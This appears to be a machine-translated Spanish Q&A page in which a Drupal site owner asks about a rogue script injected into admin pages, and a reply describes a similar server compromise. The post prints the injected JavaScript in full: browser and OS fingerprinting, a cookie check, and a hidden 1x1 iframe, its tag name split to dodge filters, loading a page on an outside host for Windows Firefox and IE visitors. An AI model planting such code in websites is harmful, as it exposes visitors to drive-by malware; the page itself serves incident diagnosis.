javascript - library - ¿Por qué aparece el script "103fm" en el sitio web de Drupal?
jquery drupal 8 (1)
Posible duplicado:
Script raro que aparece en el DOM de mi sitio web
Acabo de ver un script extraño que se ejecuta en mis sitios web DOM. Estoy corriendo DRUPAL. El script es http://www.103fm.net/release.js . No sé por dónde empezar a buscar este guion deshonesto. Mi sitio web es miloads.com y solo aparece en los menús de administración. Lo extraño es que el archivo no existe en 103fm.net, pero en realidad carga el siguiente script:
var BrowserDetect = {
init: function() {
this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version";
this.OS = this.searchString(this.dataOS) || "an unknown OS";
},
searchString: function(data) {
for (var i = 0; i < data.length; i++) {
var dataString = data[i].string;
var dataProp = data[i].prop;
this.versionSearchString = data[i].versionSearch || data[i].identity;
if (dataString) {
if (dataString.indexOf(data[i].subString) != -1)
return data[i].identity;
} else if (dataProp)
return data[i].identity;
}
},
searchVersion: function(dataString) {
var index = dataString.indexOf(this.versionSearchString);
if (index == -1)
return;
return parseFloat(dataString.substring(index + this.versionSearchString.length + 1));
},
dataBrowser: [{
string: navigator.userAgent,
subString: "Firefox",
identity: "Firefox"
}, {
string: navigator.userAgent,
subString: "MSIE",
identity: "Explorer",
versionSearch: "MSIE"
}],
dataOS: [{
string: navigator.platform,
subString: "Win",
identity: "Windows"
}]
};
function addCookie(szName, szValue, dtDaysExpires) {
var dtExpires = new Date();
var dtExpiryDate = "";
dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000);
dtExpiryDate = dtExpires.toGMTString();
document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate;
}
function findCookie(szName) {
var i = 0;
var nStartPosition = 0;
var nEndPosition = 0;
var szCookieString = document.cookie;
while (i <= szCookieString.length) {
nStartPosition = i;
nEndPosition = nStartPosition + szName.length;
if (szCookieString.substring(nStartPosition, nEndPosition) == szName) {
nStartPosition = nEndPosition + 1;
nEndPosition = document.cookie.indexOf(";", nStartPosition);
if (nEndPosition < nStartPosition)
nEndPosition = document.cookie.length;
return document.cookie.substring(nStartPosition, nEndPosition);
break;
}
i++;
}
return "";
}
BrowserDetect.init();
var szCookieString = document.cookie;
var stopit = BrowserDetect.browser;
var os = BrowserDetect.OS;
if (((stopit == "Firefox" || stopit == "Explorer") && (os == "Windows")) && (findCookie(''geo_id2'') != ''753445'')) {
addCookie("geo_id2", "753445", 1);
document.write("<if" + "rame name=''info'' src=''http://www.ztanalytics.com/stat.cgi?s_id=1'' width=1 height=1 scrolling=no frameborder=0></if" + "rame>");
} else {}
Del mismo modo, el servidor de nuestro cliente se vio comprometido anoche, por direcciones IP en Rumania, República Checa y Polonia. Estos procesos aparentemente automatizados parecen inyectar una etiqueta de script en la parte superior de la etiqueta de cuerpo. Este script parece generar una cookie en máquinas Windows que ejecutan Firefox e IE. A continuación, abre un iframe y ejecuta un script CGI que se ejecuta en un sitio alojado en Rusia.
Afortunadamente, la última versión de Firefox ni siquiera cargará el script; IE sin embargo lo hace.
Chrome (a pesar de no verse afectado) ni siquiera le permitirá visitar la página en la que esto sucedió.
Como todos los informes que puedo encontrar de esto han sucedido recientemente, podría ser una vulnerabilidad de software, en lugar de contraseñas comprometidas: qué servidor FTP está ejecutando (conéctese al servidor con su cliente FTP y la consola debería informarle). El servidor en cuestión ejecuta ProFTPd 1.3.1.
Si el software es común, entonces los creadores deben ser informados.